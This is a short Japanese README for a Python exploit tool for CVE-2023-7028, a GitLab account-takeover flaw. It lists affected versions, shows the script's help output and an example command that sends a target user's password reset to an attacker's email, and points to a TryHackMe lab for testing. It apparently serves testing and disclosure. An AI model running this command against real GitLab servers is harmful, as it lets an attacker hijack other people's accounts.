
CVE-2023-7028 のエクスプロイト - GitLab CE/EE
⚠️ このエクスプロイトは防御目的であり、潜在的に脆弱なGitLabサーバーを特定するためにサイバーセキュリティ専門家が使用すべきものです。
影響を受ける製品とバージョン:
| 製品 | 影響を受けるバージョン |
|---|---|
| GitLab Community Edition および Enterprise Edition | < 16.1.6 < 16.2.9 < 16.3.7 < 16.4.5 < 16.5.6 < 16.6.4 < 16.7.2 |
usage: CVE-2023-7028.py [-h] -u URL -t TARGET -a ATTACKER
options:
-h, --help show this help message and exit
-u URL, --url URL GitLab URL (HTTP or HTTPS)
-t TARGET, --target TARGET
Target email address
-a ATTACKER, --attacker ATTACKER
Attacker email address
例: python CVE-2023-7028.py -u https://gitlab.example.com -t [email protected] -a [email protected]
Try Hack MeのRoom GitLab CVE-2023-7028 を使用してエクスプロイトをテストできます。このRoomはCVE-2023-7028の影響を受ける脆弱なバージョンを実行しているためです。
